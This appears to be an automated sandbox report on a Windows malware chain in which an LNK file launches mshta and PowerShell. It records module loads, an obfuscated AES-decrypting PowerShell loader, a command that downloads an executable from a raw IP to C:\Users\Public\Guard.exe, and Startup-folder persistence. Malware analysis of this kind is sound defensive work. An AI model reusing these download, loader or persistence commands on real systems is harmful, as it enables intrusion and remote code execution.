Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
Source: C:\Users\Public\Guard.exeSection loaded: wsock32.dll
Source: C:\Users\Public\Guard.exeSection loaded: version.dll
Source: C:\Users\Public\Guard.exeSection loaded: winmm.dll
Source: C:\Users\Public\Guard.exeSection loaded: mpr.dll
Source: C:\Users\Public\Guard.exeSection loaded: wininet.dll
Source: C:\Users\Public\Guard.exeSection loaded: iphlpapi.dll
Source: C:\Users\Public\Guard.exeSection loaded: userenv.dll
Source: C:\Users\Public\Guard.exeSection loaded: uxtheme.dll
Source: C:\Users\Public\Guard.exeSection loaded: kernel.appcore.dll
Source: C:\Users\Public\Guard.exeSection loaded: windows.storage.dll
Source: C:\Users\Public\Guard.exeSection loaded: wldp.dll
Source: C:\Users\Public\Guard.exeSection loaded: napinsp.dll
Source: C:\Users\Public\Guard.exeSection loaded: pnrpnsp.dll
Source: C:\Users\Public\Guard.exeSection loaded: wshbth.dll
Source: C:\Users\Public\Guard.exeSection loaded: nlaapi.dll
Source: C:\Users\Public\Guard.exeSection loaded: mswsock.dll
Source: C:\Users\Public\Guard.exeSection loaded: dnsapi.dll
Source: C:\Users\Public\Guard.exeSection loaded: winrnr.dll
Source: C:\Users\Public\Guard.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: twext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cscui.dll
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: version.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: rasadhlp.dll
Source: C:\Windows\System32\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32
Source: duyba.lnk.download.lnk LNK file: ..\..\..\..\Windows\System32\forfiles.exe
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: Binary string: dvdplay.pdbGCTL source: mshta.exe, 00000004.00000003.2270225640.000001D8EE742000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2270225640.000001D8EE756000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2269552395.000001D8EE77E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2281480259.000001D8F2724000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2268763504.000001D8EE775000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2269402859.000001D8EE763000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2269906987.000001D8F2731000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2271483893.000001D8EE756000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2270056448.000001D8EE76A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2277177873.000001D8F2721000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2280822303.000001D8EE756000.00000004.00000020.00020000.00000000.sdmp, ghep2[1].4.dr
Source: Binary string: dvdplay.pdb source: mshta.exe, 00000004.00000003.2270225640.000001D8EE756000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2269552395.000001D8EE77E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2268763504.000001D8EE775000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2269402859.000001D8EE763000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2271483893.000001D8EE756000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2270056448.000001D8EE76A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2280822303.000001D8EE756000.00000004.00000020.00020000.00000000.sdmp, ghep2[1].4.dr

Data Obfuscation

Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function clean ($RptYb){return -split ($RptYb -replace '..', '0x$& ')};$TmDJyn = clean('[hex string omitted]');$MuOQabMc = [System.Security.Cryptography.Aes]::Create();$MuOQabMc.Key = clean('756561544973656A645A7544464B6A70');$MuOQabMc.IV = New-Object byte[] 16;$LaiuJGbhf = $MuOQabMc.CreateDecryptor();$mGnVsuDWp = [Text.Encoding]::UTF8.GetString($LaiuJGbhf.TransformFinalBlock
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe""
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exe Code function: 11_2_00007FF7C0E56D64 LoadLibraryA,GetProcAddress,11_2_00007FF7C0E56D64
Source: ghep2[1].4.dr Static PE information: real checksum: 0x5f0d should be: 0x150ae
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_00007FF8485700BD pushad ; iretd 6_2_00007FF8485700C1
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exe Code function: 11_2_00007FF7C0E87399 push rdi; ret 11_2_00007FF7C0E873A2
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exe Code function: 11_2_00007FF7C0E878FD push rdi; ret 11_2_00007FF7C0E87904
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 18_2_00007FF8485A00BD pushad ; iretd 18_2_00007FF8485A00C1
Source: C:\Users\Public\Guard.exe Code function: 20_2_006D8B75 push ecx; ret 20_2_006D8B88
Source: C:\Users\Public\Guard.exe Code function: 20_2_006CCBF4 push eax; retf 20_2_006CCBF8
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 24_2_002B8B75 push ecx; ret 24_2_002B8B88

Persistence and Installation Behavior

Source: LNK file Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file Process created: C:\Windows\System32\mshta.exe
Source: LNK file Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file Process created: C:\Windows\SysWOW64\cmd.exe
Source: C:\Users\Public\Guard.exe File created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\PefjSkkhb.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\Guard.exe
Source: C:\Windows\System32\mshta.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\ghep2[1]

Boot Survival

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\Guard.exe
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exe Code function: 11_2_00007FF7C0E74514 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,11_2_00007FF7C0E74514
Source: C:\Users\Public\Guard.exe Code function: 20_2_007359B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,20_2_007359B3
Source: C:\Users\Public\Guard.exe Code function: 20_2_006C5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,20_2_006C5EDA
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 24_2_003159B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,24_2_003159B3
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 24_2_002A5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,24_2_002A5EDA
Source: C:\Users\Public\Guard.exeCode function: 20_2_006D33B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,20_2_006D33B7
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
